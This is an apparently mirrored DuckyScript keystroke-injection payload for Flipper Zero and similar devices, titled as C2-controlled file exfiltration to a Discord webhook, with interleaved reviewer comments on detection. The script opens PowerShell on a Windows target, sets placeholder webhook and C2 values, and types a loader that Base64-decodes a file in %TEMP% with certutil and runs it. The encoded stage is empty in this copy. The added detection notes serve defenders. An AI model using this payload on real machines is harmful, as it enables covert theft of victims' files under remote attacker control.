mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-31 10:50:17 +00:00
REM Title: C2 Data Exfiltration with File Splitter w Discord Webhook
|
|
REM Description: Finds all specified filetypes and zips them into a file and sends
|
|
REM to Discord Webhook. If the zip file is too large, split and send in chunks.
|
|
REM Supports 7zip filecombining. C2 is used to IDLE and ACTIVATE and KILL the
|
|
REM payload remotely. C2 File must be hosted on GitHub unless you know how to
|
|
REM modify the source. UberGuidoz and REDD (InfoSecREDD) are NOT responsible for
|
|
REM the misuse of this payload.
|
|
REM AUTHOR: InfoSecREDD
|
|
REM Version: 1.4.2
|
|
REM Category: Exfiltration (REMOTE)
|
|
REM Compatibility: Flipper Zero AND DuckyScript Devices
|
|
REM Target: Windows
|
|
|
|
REM To use on Flipper Zero REM the DUCKY_LANG US from line below
|
|
REM DUCKY_LANG US
|
|
REM Reviewer summary: this is a keystroke-injection sequence. It opens the Windows Run
REM dialog, starts PowerShell, types three statements onto one prompt line, and submits
REM them with the final ENTER. The DELAY values pace the typing, so statement order and
REM timing are part of the behavior.
REM Detection: an interactive powershell process started from the Run dialog is the
REM earliest visible signal; process-creation logging (Security 4688 or Sysmon 1)
REM records it. Presumably it follows a new HID keyboard enumerating - confirm in USB logs.
DELAY 2000
|
|
GUI r
|
|
DELAY 500
|
|
STRING powershell
|
|
ENTER
|
|
DELAY 2000
|
|
REM Put your webhook below.
REM The value is a placeholder in this copy. Per the header, the Discord webhook is the
REM destination for the collected archive, so egress to Discord webhook URLs from hosts
REM with no business need for it is a filtering and alerting point.
|
|
STRING $webhook = "DiscordWebhookHere";
|
|
REM C2 file must be hosted at GitHub unless you can edit the file. 1 = ON and 0 = OFF
REM NOTE(review): per the header this file is the remote idle/activate/kill switch; the
REM code that reads it is not visible on this page, so how often it is fetched is unknown.
|
|
STRING $ccontrol = "C2FileHere";
|
|
REM Put it all together now..
REM The three STRING lines have no ENTER between them, so they reach PowerShell as one
REM line joined by ';'. This line redirects echo output to %TEMP%\temp.ps1, has certutil
REM Base64-decode it to %TEMP%\l.ps1 (-f overwrites, output discarded), then runs l.ps1.
REM NOTE(review): the echo argument is empty in this copy, so the encoded stage is
REM missing here and what l.ps1 does cannot be verified from this page.
REM Detection: certutil.exe with -decode writing a .ps1 under %TEMP%, followed by
REM powershell executing that file, are high-signal events; PowerShell script block
REM logging (event 4104) records the script content when it runs. Application control
REM (WDAC/AppLocker) policy covering scripts run from %TEMP% is the relevant mitigation.
|
|
STRING $TempFile = "$env:TEMP\temp.ps1"; $File = "$env:TEMP\l.ps1"; echo  > "$TempFile"; certutil -f -decode "$TempFile" "$File" | out-null; & "$env:TEMP\l.ps1"
|
|
DELAY 1000
|
|
ENTER
|